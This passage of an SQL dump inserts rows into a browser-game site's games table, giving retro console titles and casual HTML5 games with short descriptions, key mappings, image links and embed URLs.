(101, 'Rolling Thunder 3', '<p><strong>Rolling Thunder 3</strong></p><p>&nbsp;</p><p>Rolling Thunder 3 is a 1993 run and gun video game published by Namco released for the Sega Genesis. It is a sequel to Rolling Thunder 2. The game was made specifically for home consoles, which allowed the developers to implement more extensive gameplay features that otherwise would not had been possible in a regular arcade release.&nbsp;</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/g6.png', 'https://megadrive-emulator.com/game/?game=Rolling_Thunder_3.bin', 'Yes', 'Shooting', 0, 0, '', 0, 'md'),
(104, 'Ariel The Little Mermaid', '<p><strong>Ariel The Little Mermaid</strong></p><p>Despite being named after the movie of the same title, the game\'s plot bears little resemblance. The story is that Ursula, the Sea Witch is plotting to take over Atlantica and is transforming its populace into polyps. Not only that, but she has also managed to kidnap a member of the royal family, (either Triton or Ariel depending on who you play). It is up to Triton/Ariel to traverse many dangerous locations, defeat Ursula\'s minions, and free the ocean from her tyranny once and for all.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/g5.png', 'https://megadrive-emulator.com/game/?game=ariel_the_little_mermaid.gen', 'Yes', 'Adventure', 0, 0, '', 0, 'md');
INSERT INTO `zon_games` (`id`, `game_name`, `game_description`, `game_image_url`, `game_url`, `game_published`, `game_category`, `game_status`, `game_played`, `game_banner_url`, `is_featured`, `game_card_size`) VALUES
(108, 'James Pond 3: Operation Starfish', '<p>James Pond 3: Operation Starfish The game was also released for the Amiga and Amiga CD32 platforms, the Super Nintendo and the Sega Game Gear. Operation Starfish is the third and last game in the James Pond series. It is also the only one that was only released for AGA Amigas: the Amiga 1200, the Amiga 4000 and CD32. The game\'s working title was James Pond 3: Splash Gordon, a pun on Flash Gordon. Although it enjoyed good sales, it was not as well received as other games in the series.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/g4.png', 'https://megadrive-emulator.com/game/?game=James_Pond_3_-_Operation_Starfish_UEJ.bin', 'Yes', 'Arcade', 0, 0, '', 0, 'md'),
(110, ' The G.G. Shinobi II: The Silent Fury', '<p>The G.G. Shinobi II: The Silent Fury is a side-scrolling action game by Sega released for the Game Gear in 1992. It is the sequel to The G.G. Shinobi, an off-shoot of the Shinobi series created for Sega\'s portable platform.&nbsp;</p><p>&nbsp;</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/g3.png', 'https://megadrive-emulator.com/game/?game=Super_Shinobi_2_J.bin', 'Yes', 'Arcade', 0, 0, '', 0, 'md'),
(113, 'Bugs Bunny in Double Trouble', '', 'https://yassi.xyz/book/g1.png', 'https://megadrive-emulator.com/game/?game=Bugs_Bunny_in_Double_Trouble_4.bin', 'Yes', 'Adventure', 0, 0, '', 0, 'md'),
(116, 'Calcudoku Puzzle', '<p>Calcudoku Puzzle it is suduko games .</p>', 'https://yassi.xyz/book/g13.png', 'https://www.cokogames.com/games/calcudoku/', 'Yes', 'Puzzle', 0, 0, '', 0, 'md'),
(117, 'Soldier Legend by FreezeNova', '<h2><strong>Soldier Legend by FreezeNova</strong></h2><p>&nbsp;</p><p>&nbsp;</p><p><strong>is a shooting game in which you play as a trained and weaponized soldier. The task is to eliminate all the green monsters organized in waves. These enemy forces will try to attack and kill you. The battle is intense in each wave, so you must prepare for action.</strong></p>', 'https://yassi.xyz/book/g14.png', 'https://unblocked-games.s3.amazonaws.com/games/2024/q/11/soldier-legend/index.html', 'Yes', 'Action', 0, 0, '', 0, 'md'),
(118, 'World Trophy Soccer', '<p><strong>World Trophy Soccer:</strong></p><p><strong>&nbsp;is a football game developed by Krisalis Software and published by Virgin Games for the Sega Mega Drive in 1993. It is a re-worked version of European Club Soccer featuring national teams instead of localised ones. It was only released in the United States.</strong></p>', 'https://yassi.xyz/book/g15.png', 'https://megadrive-emulator.com/game/?game=World_Trophy_Socceru.bin', 'Yes', 'SEGA', 0, 0, '', 0, 'md'),
(119, 'The Gadget Twins', '<p>The Gadget Twins is a 1992 side-scrolling beat-\'em-up developed by Imagitec Design Inc. and published by GameTek for the Sega Mega Drive. A green airplane named Thump steals the Magic Gem from the royal palace of Gadget Land. When the King finds out, he sends Bop and Bump, red and blue planes (respectively), to retrieve it. The game can be played either by one player (Bop) or by two players (1P Bop, 2P Bump). The goal is to get through each stage by destroying enemies with small spring-loaded fists attached to the top, bottom, left, and right of your plane. A attacks and B changes the direction of the attack (you can only attack in one direction at a time, and the direction is independent of what way you are facing). The D-pad moves around the screen, which will always scroll, so be quick! Each enemy drops a gold coin you must collect for currency. If you see an entry portal to a shop, hit C to go in. Here, you can buy weapons. Use Left/Right to select an item, Up/Down to select \'Buy\' or \'Exit,\' and B to buy/exit. If you choose to buy, use the D-pad to select which side you want the weapon on (you only have a limited number of sides to choose from) and B to confirm the buy or C to cancel.</p>', 'https://yassi.xyz/book/g16.png', 'https://megadrive-emulator.com/game/?game=Gadget_Twinsu.bin', 'Yes', 'Arcade', 0, 0, '', 0, 'md'),
(121, 'Sonic 1 and Knuckles', '<p><strong>Sonic 1 and Knuckles Sonic &amp; Knuckles + Sonic 1 &nbsp;is a 1994 platform video game in the Sonic the Hedgehog series for the Sega Genesis. It was developed in the United States at Sega Technical Institute by members of Sonic Team, and was published by Sega worldwide on October 18, 1994. In addition to being a standalone game, through a system dubbed \'lock-on technology,\' Sonic &amp; Knuckles acts as an expansion pack to both Sonic the Hedgehog 2 and Sonic the Hedgehog 3, the latter with which it was developed in tandem. Sonic &amp; Knuckles has been released on various Sonic and Sega themed compilations over the years, and digitally for the Wii\'s Virtual Console, and Xbox Live Arcade.</strong></p><p>&nbsp;</p><p>&nbsp;</p>', 'https://yassi.xyz/book/g18.png', 'https://megadrive-emulator.com/game/?game=sonic_and_knuckles_sonic_1_jue_h2.gen', 'Yes', 'SEGA', 0, 0, '', 0, 'md'),
(122, 'Dino Land', '<p><strong>Dino Land &nbsp;</strong> is a pinball game developed by Wolfteam for the Sega Mega Drive/Genesis. This game was originally released in 1991 for the North American and Japanese markets.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start<br>&nbsp;</p><p><br>&nbsp;</p><p>&nbsp;</p>', 'https://yassi.xyz/book/g19.png', 'https://megadrive-emulator.com/game/?game=Dino_Land_JU.bin', 'Yes', 'SEGA', 0, 0, '', 0, 'md'),
(123, 'Snake Labyrinth by Dukebot', '<p>Just collect all the eggs on the map to win the level! Simple isn\'t it? But try not to get stuck with your own body. You can play the game with the keyboard arrows or with the mouse, it\'s up to you.</p>', 'https://yassi.xyz/book/g20.png', 'https://html-classic.itch.zone/html/2716053/index.html', 'Yes', 'Puzzle', 0, 0, '', 0, 'md'),
(124, 'Megaman X3', '<p><strong>Megaman X3 : &nbsp;</strong> known as Rockman X3 &nbsp;in Japan, is a video game developed by Capcom for the Super Nintendo Entertainment System (SNES). &nbsp;megaman x3 it is The game was originally released in Japan on December 1, 1995 and later in North American and PAL regions in 1996. It is the third game in the Mega Man X series and the last to appear on the SNES. Mega Man X3 takes place in a fictional future in which the world is populated by humans and intelligent robots called \'Reploids\'. Like their human creators, some Reploids involve themselves in destructive crime and are labelled as \'Mavericks\'. After twice defeating the Maverick leader Sigma, the heroes Mega Man X and Zero must battle a Reploid scientist named Dr. Doppler and his utopia of Maverick followers. Mega Man X3 follows in the tradition of both the original Mega Man series and the Mega Man X series as a standard action-platform game. The player traverses a series of eight stages in any order while gaining various power-ups and taking the special weapon of each stage\'s end boss. Mega Man X3 is the first game in the series in which Zero is a playable character in addition to X. Like its predecessor, Mega Man X2, X3 features the \'Cx4\' chip to allow for some limited 3D vector graphics and transparency effects. A 32-bit version of Mega Man X3 was released on the PlayStation, Sega Saturn, and Windows in various countries. This version was included on the North American Mega Man X Collection in 2006. The game was also ported to Japanese mobile phones in 2010. Critical reception for Mega Man X3 has been above average. However, the game, particularly the 32-bit version, has received miscellaneous criticism from reviewers for its lack of improvements to the series.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/g21.png', 'https://supernintendoemulator.com/game/?game=Megaman_X3', 'Yes', 'Action', 0, 0, '', 1, 'md'),
(125, 'Donkey Kong Country', '<p>Donkey Kong Country is a platform video game developed by Rare that was originally published for the Super Nintendo Entertainment System. It was first released on November 21, 1994 in North America and on November 24, 1994 in Europe. Donkey Kong Country was the first Donkey Kong game that was not produced or directed by Shigeru Miyamoto, the character\'s original creator. It was produced by Tim Stamper instead, although Miyamoto was still involved with the project.</p>', 'https://yassi.xyz/book/g22.png', 'https://supernintendoemulator.com/game/?game=Donkey_Kong_Country', 'Yes', 'SEGA', 0, 0, '', 0, 'md'),
(126, 'Super Mario World', '<p><strong>Super Mario World</strong></p><p>Super Mario World Sūpā Mario Wārudo?), subtitled Super Mario Bros. 4 &nbsp;Sūpā Mario Burazāzu fō?) for its original Japanese release, is a 1990 platform video game developed and published by Nintendo as a pack-in launch title for the Super Nintendo Entertainment System (SNES) and is the fifth game in the Super Mario series. Development was handled by Nintendo Entertainment Analysis and Development, led by Shigeru Miyamoto, who directed the game along with Takashi Tezuka. The game centers on the quest of Mario and Luigi to save Dinosaur Land from Bowser, the series\' antagonist. The two brothers must travel across seven worlds to restore order to Dinosaur Land. It built on the gameplay of previous Mario games by introducing new power-ups that augment character abilities, and established conventions that were carried over to future games in the series. Super Mario World marks the first appearance of Yoshi, Mario\'s dinosaur sidekick and riding mount. Super Mario World was an overwhelming critical and commercial success, selling over 20 million copies worldwide, and is considered by many to be one of the best games ever made. It has been re-released four times, first as part of a combo with Super Mario All-Stars on the SNES in 1994. Secondly, it was released on the Game Boy Advance as Super Mario Advance 2) in 2001 and outside of Japan as Super Mario World: Super Mario Advance 2 in 2002 with modified gameplay. The third re-release was for the Wii\'s Virtual Console in Japan in 2006 and in North America and PAL regions in 2007; there were no changes from the original SNES version. It was also released for the Wii U\'s Virtual Console which integrated Off-TV Play and Miiverse features to the game.</p><p><strong>How to play:</strong></p><p>↑ = up<br>→ = right<br>↓ = down<br>← = left<br><br>Z = A Button<br>X = B Button<br>A = X Button<br>S = Y Button<br><br>Q = L Button<br>E = R Button<br><br>Shift = Select<br>Enter = Start</p>', 'https://yassi.xyz/book/g23.png', 'https://supernintendoemulator.com/game/?game=Super_Mario_World', 'Yes', 'Adventure', 0, 0, '', 0, 'md'),
(127, 'Stick Archer Champion', 'Defeat other stick figures and show the world whos the finest archer in Stick Archer Champion, an action game. Delve into the realm of stick figures and unearth their secret meanings. Arm yourself with better bows, arrows, quivers, and shields. Learn new talents and unlock new effects to unlock more arrows. Add personality to your stickman by letting him wear a variety of caps, masks, hairdos, beards, and animations. Add more stickers to the stickman flag collection.', 'https://img.gamemonetize.com/sau8efctplff566hb06hzx5jyhgu6xyd/512x384.jpg', 'https://html5.gamemonetize.com/sau8efctplff566hb06hzx5jyhgu6xyd/', '0', 'Fighting', 0, 0, '', 0, ''),
(128, 'Draw Save Puzzle', 'Draw Save Puzzle - draw one line to save Stickman from the threat! Are you a good artist or Do you want to test your creative skills? Are you a fan of puzzles? Now you have a good chance! Draw a line to help the little man and protect him from swords, bullets, bombs.... and many other life-threatening attacks! You are free to draw any cover and protection to help the little man survive. Learn to draw lines creatively, develop logic and grow your brain! GAME FEATURES + Lots of levels and endless fun! + Never be bored again! + Simple but amazing physics system! + Improve your brain! + Exciting and relaxing gameplay.', 'https://img.gamemonetize.com/76kn0zqb9ti95c31997em839qaaq0bj2/512x384.jpg', 'https://html5.gamemonetize.com/76kn0zqb9ti95c31997em839qaaq0bj2/', '0', 'Fighting', 0, 0, '', 0, ''),
(129, 'Stick Man Battle Fighting', 'Enter the world of Stick Man Battle Fighting and every move matters! This casual fighting game lets you unleash your skills in dynamic stickman battles against enemies. Master various fighting styles and begin exciting single-mode combat. Choose a weapon and customize your hero.', 'https://img.gamemonetize.com/lyqrzmhsa4gdejjhe2c1fadi6uw6gaen/512x384.jpg', 'https://html5.gamemonetize.com/lyqrzmhsa4gdejjhe2c1fadi6uw6gaen/', '0', 'Fighting', 0, 0, '', 0, ''),
(130, 'Dont be angry with match man', 'This is a match man character game. Each level we have prepared unexpected traps for everyone, the trap layout in the game is the need to experience the game to clear, the game needs to have patience to go through', 'https://img.gamemonetize.com/ab073sarz93hhpqep83h98auqq9o4yyf/512x384.jpg', 'https://html5.gamemonetize.com/ab073sarz93hhpqep83h98auqq9o4yyf/', '0', 'Fighting', 0, 0, '', 0, ''),
(131, 'Stickman vs Zombies Minecraft', 'Stickman vs Zombies Minecraft is an action-adventure platform game in which you can play as a brave stick ninja. When you play as a stickman hero, eliminate all the craft zombies and collect coins with each eliminated sombie so you can unlock new skins. Move around the map and look for all the zombies before they find you and run to catch you or shoot at your position. Dont leave even one alive, dont stop moving or all the zombie craft will try to catch you.', 'https://img.gamemonetize.com/bztju5apx957kapkxnzocq3au3f8kq3y/512x384.jpg', 'https://html5.gamemonetize.com/bztju5apx957kapkxnzocq3au3f8kq3y/', '0', 'Fighting', 0, 0, '', 0, ''),
(132, 'Zombie Royale Io', 'Zombie Royale io is a collecting survival arcade IO game. With 3D cartoon survivors, you need to help them rescue more survivors and shoot down as many zombies as you can. As the time goes on, you will meet more and more strong zombies. They will come and chase the last survivors randomly. You can summon more soldiers and bombs in the game. After each round, you can use the gold coins to upgrade your survivors.', 'https://img.gamemonetize.com/d3zex3l2rordlog1xeiq4id7521xskby/512x384.jpg', 'https://html5.gamemonetize.com/d3zex3l2rordlog1xeiq4id7521xskby/', '0', 'Fighting', 0, 0, '', 0, ''),
(133, 'City Run.io', 'In this fast-paced game, youll find yourself hurtling through bustling cities, dodging pedestrians and obstacles as you go. Your goal is to collect grey pedestrians and merge them into a single, giant entity, allowing you to take on other opponents and compete for dominance. As you progress, youll need to navigate increasingly crowded streets and challenging terrain to emerge victorious. Can you outrun and outmaneuver your opponents to be crowned the ultimate winner?', 'https://img.gamemonetize.com/yffqin0i6g8wp9s0d2ceppd0nafsp15m/512x384.jpg', 'https://html5.gamemonetize.com/yffqin0i6g8wp9s0d2ceppd0nafsp15m/', '0', 'Fighting', 0, 0, '', 0, ''),
(134, 'Stickman The Flash', 'Stickman The Flash is a fighting RPG arcade game with 2D stickman warriors. In the Survival Mode, you need to survive as long as you can by dodging red areas and killing incoming enemies. You can collect different weapons when you kill the corresponding enemies. When you earn enough gems, you can unlock and equip them in the Equipment Store, and they will increase your full abilities. Keep calm and slaughter them all!', 'https://img.gamemonetize.com/qfh8jceadtfl6m0ilctnpy6elqpdp04p/512x384.jpg', 'https://html5.gamemonetize.com/qfh8jceadtfl6m0ilctnpy6elqpdp04p/', '0', 'Fighting', 0, 0, '', 0, ''),
(135, 'Wood Man Cutter', 'Welcome to Wood Man Cutter 3D Game! Tap and hold to start walking, rotating with an elastic rope. Begin cutting wood from trees, but be careful to avoid metal objects and rocks. Can you pass the level 3? Enjoy this game on gamemonetize.com', 'https://img.gamemonetize.com/9dn6qz1nr6ldwr082r4t7o55aeyo3owt/512x384.jpg', 'https://html5.gamemonetize.com/9dn6qz1nr6ldwr082r4t7o55aeyo3owt/', '0', 'Fighting', 0, 0, '', 0, ''),
(136, 'Javelin Battle', 'Javelin Battle is a spear-throwing physics puzzle game with 2D stickman models. We need you to eliminate all incoming enemies at each level in the Normal Mode. When you destroy enemy infantrys shields, they will run to you quickly. I strongly suggest you destroy the enemy spearmen on the platforms first. Dont forget to choose skills to increase your abilities and power. Keep calm and aim carefully.', 'https://img.gamemonetize.com/a006nqrea1p11ps579qsfeljddvark7m/512x384.jpg', 'https://html5.gamemonetize.com/a006nqrea1p11ps579qsfeljddvark7m/', '0', 'Fighting', 0, 0, '', 0, ''),
(137, 'Party Games Mini Shooter Battle', 'Party Games: Mini Shooter Battle is a battle-royale shoot-em-up game with 2D cartoon models. In 4 modes, you can shoot other players to earn scores for coins and gems. Then you can buy more roles and guns in the Shop. Your character can aim at the closest target automatically so that you only need to fire and dodge bullets from enemies. More kills and less death will make you claim more coin and gem rewards. Good luck!', 'https://img.gamemonetize.com/ss99whqqix1wim1twd1aq59xtdqw8iu5/512x384.jpg', 'https://html5.gamemonetize.com/ss99whqqix1wim1twd1aq59xtdqw8iu5/', '0', 'Fighting', 0, 0, '', 0, ''),
(138, 'Candy Ice Cream Crush', 'Candy Ice Cream Crush: A Vibrant Sweet Journey Embark on an exciting journey with Candy Ice Cream Crush! This is a vibrant match-three game inspired by the classic Candy Crush Saga. With the theme of candy ice cream, it creates a dreamy game world for players.', 'https://img.gamemonetize.com/9a2j73cl44xhuivixd6013ntevjmfszi/512x384.jpg', 'https://html5.gamemonetize.com/9a2j73cl44xhuivixd6013ntevjmfszi/', '0', 'Puzzles', 0, 0, '', 0, ''),
(139, 'Cell Escape', 'Cell Escape is an engaging physics-based puzzle game featuring 60 exciting levels! Your objective is to eliminate all boxes and blocks&amp;mdash;except for the grassy area&amp;mdash;where the prisoner is located. Just click or tap on the blocks to destroy them strategically. Use the remaining blocks creatively to guide the prisoner safely onto the grass. If you make a mistake, don&amp;rsquo;t worry&amp;mdash;you can easily reset the level and try again. Challenge yourself to solve each puzzle and help the prisoner escape in this captivating physics adventure! Web Dev &lt;a href=\'https://www.giugames.com/\'&gt;https://www.giugames.com/&lt;/a&gt;', 'https://img.gamemonetize.com/hrwkashqoo7fhvppv99z1ri63xxj70qd/512x384.jpg', 'https://html5.gamemonetize.com/hrwkashqoo7fhvppv99z1ri63xxj70qd/', '0', 'Puzzles', 0, 0, '', 0, ''),
(140, 'Giveaway Checkers', 'Giveaway Checkers or AntiCheckers or Reversed Checkers. Play with computer, online with friends, or together on same screen. - Selection of time control modes: unlimited, bullet, blitz, rapid, classic - 8 difficulty levels from Beginner to World Champion - Display of possible moves when choosing a piece - Interactive tips on how to play better during the game - Cancel the move, if there was a yawn, you can go back - The ability to replay the game from the right place - Interact with the opponent through funny cartoon emotions - Real live players - Saving the rating, you can compete with leaders', 'https://img.gamemonetize.com/594795s0fh64izkmnelrpracbmz1we3t/512x384.jpg', 'https://html5.gamemonetize.com/594795s0fh64izkmnelrpracbmz1we3t/', '0', 'Puzzles', 0, 0, '', 0, ''),
(141, 'Quiz Goose Math', 'Looking for a fun and educational game? Look no further than Quiz Goose Math! Roll the dice and step into the boxes, but watch out for the quiz boxes that will test your math skills. Answer correctly to advance further, but be careful - incorrect answers will set you back. With challenging questions and entertaining gameplay, Quiz Goose Math is the perfect blend of learning and fun. Play now and see how far you can go!', 'https://img.gamemonetize.com/yshmlvi9nfvclrsb5717cormnog76789/512x384.jpg', 'https://html5.gamemonetize.com/yshmlvi9nfvclrsb5717cormnog76789/', '0', 'Puzzles', 0, 0, '', 0, ''),
(142, 'Mythic Auto Chess Realms', 'Mythic Auto Chess Realms is an auto chess strategy adventure game that combines the classic auto chess gameplay with a relaxing idle playstyle, offering players a brand-new gaming experience. In Mythic Auto Chess Realms, diverse team compositions and countless strategies await for you to unlock and enjoy a different kind of fun.', 'https://img.gamemonetize.com/986fun05qwydiarux83m6eoy6bv94voc/512x384.jpg', 'https://html5.gamemonetize.com/986fun05qwydiarux83m6eoy6bv94voc/', '0', 'Puzzles', 0, 0, '', 0, ''),
(144, 'Penty', 'Penty is a fun and addictive HTML5 game where you need to connect adjacent gems of the same color to score big. With its simple yet challenging gameplay, Penty is sure to keep you entertained for hours. Play now and see how high you can score!', 'https://img.gamemonetize.com/r4dpgggva8y5dexih070qs3jyzi7uup5/512x384.jpg', 'https://html5.gamemonetize.com/r4dpgggva8y5dexih070qs3jyzi7uup5/', '0', 'Puzzles', 0, 0, '', 0, ''),
(145, 'Emoji Skill Puzzles', 'Emoji Skill Puzzles is an engaging skill game. Featuring levels constructed entirely with popular emojis. The game offers six distinct puzzle types: link puzzle, memory puzzle, word quiz, related puzzle, shadow puzzle, and crop puzzle. This game is perfect for players who enjoy brain teasers and want to test their problem-solving skills.', 'https://img.gamemonetize.com/grcoj83culvapsxit0uaznoyk1yqf6a0/512x384.jpg', 'https://html5.gamemonetize.com/grcoj83culvapsxit0uaznoyk1yqf6a0/', '0', 'Puzzles', 0, 0, '', 0, ''),
(146, 'Spooky Links', 'Spooky Link is a relaxing Halloween-themed game where you connect matching spooky tiles. Tap a tile, then tap its match. If the path between them has two or fewer turns, the tiles are cleared. Each cleared tile creates more space to connect others. Enjoy many levels of fun with Halloween surprises!', 'https://img.gamemonetize.com/gkqfxpc88k3u5ac09dslws82ivboob75/512x384.jpg', 'https://html5.gamemonetize.com/gkqfxpc88k3u5ac09dslws82ivboob75/', '0', 'Puzzles', 0, 0, '', 0, ''),
(147, 'Candy Cascade', 'Click on groups of two or more candies to destroy them. You need to collect certain amount of different sweets on every level. Wooden blocks, honey and jam should be cleared from the game field. If there is a key on the game field it should be dropped down. The moves are limited for each level. If you have hard time with a task you can use bonuses that can be received when you collect jam. here are 40 levels in the game. And if the first levels seem simple to you, then I have strong doubts that many people will pass the last one. But I think that if you have a lot of bonuses, it can really be done', 'https://img.gamemonetize.com/d41vzzxrgz9tzrkmdeezt7e8vxnrjfy0/512x384.jpg', 'https://html5.gamemonetize.com/d41vzzxrgz9tzrkmdeezt7e8vxnrjfy0/', '0', 'Puzzles', 0, 0, '', 0, ''),
(148, 'Blocks Move HIT   PRO', 'Calling all blockheads and those who are called brainy! In Blocks - Move &amp;amp; HIT -PRO youre a hero on a mission, but the path is ever-changing. Navigate a maze of immovable stone blocks that bounce you off course with every bump. Will you hit a 45-degree angle and zip diagonally, or take a full 90-degree turn? Master the rebounds, solve the shifting puzzle, and guide your block to its destined end!', 'https://img.gamemonetize.com/qxlzvjrlxn6clye52zlgntdyjb3ho7w2/512x384.jpg', 'https://html5.gamemonetize.com/qxlzvjrlxn6clye52zlgntdyjb3ho7w2/', '0', 'Puzzles', 0, 0, '', 0, ''),
(149, 'FLOORLAND CREATOR', 'The void is a game where you manage the cards of famous players, you can win prizes from the game, join now and play to win incredible rewards', 'https://img.gamemonetize.com/suba12vwfb7y6adfy4dbtxmef0sekzl2/512x384.jpg', 'https://html5.gamemonetize.com/suba12vwfb7y6adfy4dbtxmef0sekzl2/', '0', 'Soccer', 0, 0, '', 0, ''),
(150, 'Goal Arena 3D', 'Welcome to Goal Arena 3D Online Soccer Game! Swipe left and right to control your goalkeeper and prevent the ball from passing through the goalpost. You have 3 chances, so score goals against the 3 other opponents and guard your post very well to win.', 'https://img.gamemonetize.com/n6rox98hlgh30vr4xqr2tjqkrstmdgrf/512x384.jpg', 'https://html5.gamemonetize.com/n6rox98hlgh30vr4xqr2tjqkrstmdgrf/', '0', 'Soccer', 0, 0, '', 0, ''),
(151, 'Flick n Goal', 'Get ready for an electrifying soccer experience with Flick n Goal! Choose your team from a diverse roster of countries and dive into the action-packed world of international football. Strategically place your players, set your formation, and unleash your tactical prowess as you compete in thrilling matches. Whether youre a seasoned soccer aficionado or a casual gamer, Flick n Goal offers excitement for all levels of players. With intuitive controls and dynamic gameplay, every match is a pulse-pounding adventure from kickoff to final whistle.', 'https://img.gamemonetize.com/wn3blhqcrzynyt126r2iltb3zciimksm/512x384.jpg', 'https://html5.gamemonetize.com/wn3blhqcrzynyt126r2iltb3zciimksm/', '0', 'Soccer', 0, 0, '', 0, ''),
(152, 'Pinball Football Champion', 'Lace up and unleash your gridiron skills in Pinball Football Champion! This action-packed mobile game combines the classic thrills of pinball with the heart-pounding intensity of football. Flick the players to launch the ball, strategically maneuver it through bumpers and pins, and rack up points on the scoreboard. Can you master the field, score big, and become the Pinball Football Champion? Download now and see if you have the skills to dominate!', 'https://img.gamemonetize.com/fjyu89wcncn7ancvltwpyjul95lhgwft/512x384.jpg', 'https://html5.gamemonetize.com/fjyu89wcncn7ancvltwpyjul95lhgwft/', '0', 'Soccer', 0, 0, '', 0, ''),
(153, 'CapsuleMatch', 'CapsuleMatch is a fast-paced and addictive two-player game. Players control capsules on the left and right sides, attempting to score goals in their opponents net. In the two-player mode, each player controls their respective capsule and must react quickly to the gameplay. The objective of the game is to increase your score by scoring goals in the opponents net. The first player to reach 5 points wins the game. CapsuleMatch offers various superpowers to provide players with a fun and competitive experience. These powers can increase players speed, boost the balls speed, provide defensive shields, or enlarge the players size.', 'https://img.gamemonetize.com/0yzibjxa0j3w8rhdsrgxb17umd8r0dev/512x384.jpg', 'https://html5.gamemonetize.com/0yzibjxa0j3w8rhdsrgxb17umd8r0dev/', '0', 'Soccer', 0, 0, '', 0, ''),
(154, 'Shaolin Soccer', 'It is an engaging puzzle game where your objective is to descend safely. It appears straightforward at first glance but offers profound depth. Navigate through numerous levels, honing your intellect while enjoying the journey. Website Developer &lt;a href=\'https://www.bestcrazygames.com/home/keyword/stickman\'&gt;https://www.bestcrazygames.com/home/keyword/stickman&lt;/a&gt;', 'https://img.gamemonetize.com/1re3k4h9vkknttyops13remtr23af95n/512x384.jpg', 'https://html5.gamemonetize.com/1re3k4h9vkknttyops13remtr23af95n/', '0', 'Soccer', 0, 0, '', 0, ''),
(155, 'Soccer Hero', 'A single player football game with multiple characters that can be developed and upgraded, using buttons to move and kick the ball.', 'https://img.gamemonetize.com/cl9ik2kgtk7kxt89jl9hr1dbzfxmv7k5/512x384.jpg', 'https://html5.gamemonetize.com/cl9ik2kgtk7kxt89jl9hr1dbzfxmv7k5/', '0', 'Soccer', 0, 0, '', 0, ''),
(156, 'Grimace Ball Jumpling', 'Help Grimace to not let the ball fall! How many times you can juggle these two soccer balls? How to play: - Tap left side of screen to kick the left football - Tap right side of screen to kick the right football Warning: This game create dependence! :-)', 'https://img.gamemonetize.com/2eeizpsva0s0kdpw0zf5trn08s98fsva/512x384.jpg', 'https://html5.gamemonetize.com/2eeizpsva0s0kdpw0zf5trn08s98fsva/', '0', 'Soccer', 0, 0, '', 0, ''),
(157, 'Run and Shoot GOAL!', 'Run without hitting obstacles and opposing team players. collect as much blue power as you can and hit the ball harder. Then direct the ball and try to pass the goalkeeper. You can score your goal and move on to the next level! According to the power you collect, the height of the ball increases and the probability of the goalkeeper to save decreases. If you want, you can transfer between halftime and change your character. hitting sticks loses 1 power. hitting obstacles lose 10 power', 'https://img.gamemonetize.com/sfgt6xl9hugkmihr98y1jzma6t7knvl9/512x384.jpg', 'https://html5.gamemonetize.com/sfgt6xl9hugkmihr98y1jzma6t7knvl9/', '0', 'Soccer', 0, 0, '', 0, ''),
(158, 'Skibidi Toilet Ball Juggling', 'Help Skibidi Toilet to not let the ball fall! How many times you can juggle these two soccer balls? How to play: - Tap left side of screen to kick the left football - Tap right side of screen to kick the right football Warning: This game create dependence :)', 'https://img.gamemonetize.com/4dtfkvch0u66bm4hum60gl4dibqulc19/512x384.jpg', 'https://html5.gamemonetize.com/4dtfkvch0u66bm4hum60gl4dibqulc19/', '0', 'Soccer', 0, 0, '', 0, ''),
(159, 'Skibidi Toilet Soccer', 'Skibidi is a great goalkeeper in soccer training! Use your finger to slide goalkeeper to the kicked penalty. As a super goalkeeper you must protect your goal from as much incoming balls as you can. How to Play: - The computer will shoot soccers - Just swipe the screen to control Skibidi Enjoy your soccer game! Become a Skibidi Soccer Goalkeeper Superstar!', 'https://img.gamemonetize.com/sy3abv7l2dkmrmt8ez8s30wsyrrnpodo/512x384.jpg', 'https://html5.gamemonetize.com/sy3abv7l2dkmrmt8ez8s30wsyrrnpodo/', '0', 'Soccer', 0, 0, '', 0, ''),
(160, 'Mini Tennis', 'This exciting arcade sports game is easy to pick up but challenging to master if youre aiming for high scores! Like in a classic tennis match, returning the balls demands speed and precision one misstep, and its game over! The longer you stay on the court, the faster the tennis balls come flying at you, and its up to you to return each one while dodging airborne bottles. Be warned: earning the Platinum medal is a true test of skill! Only those with grand slam-worthy reflexes can claim it!', 'https://img.gamemonetize.com/0g1lbwa9t0i9se2gx1a15f0x1j5eto2t/512x384.jpg', 'https://html5.gamemonetize.com/0g1lbwa9t0i9se2gx1a15f0x1j5eto2t/', '0', 'Sports', 0, 0, '', 0, ''),
(161, 'Mini Goalie', 'Jump into the action as the goalie in Mini Goalie! In this exciting game, put your reflexes to the test as you slide the goalkeeper across the goal line to block every penalty kick. Your mission as the ultimate goalie is clear: defend the net against an endless wave of incoming shots. Make incredible saves, hone your skills, and keep those goals out! How to Play: The computer will launch soccer balls toward the goal. Swipe on the screen to control your mini goalie and intercept each shot. Get ready to dive, block, and defend! Play Mini Goalie now and become the ultimate Soccer Goalkeeper Superstar!', 'https://img.gamemonetize.com/ttig4tj1axodc6zcnc88fon5qm27yprt/512x384.jpg', 'https://html5.gamemonetize.com/ttig4tj1axodc6zcnc88fon5qm27yprt/', '0', 'Sports', 0, 0, '', 0, ''),
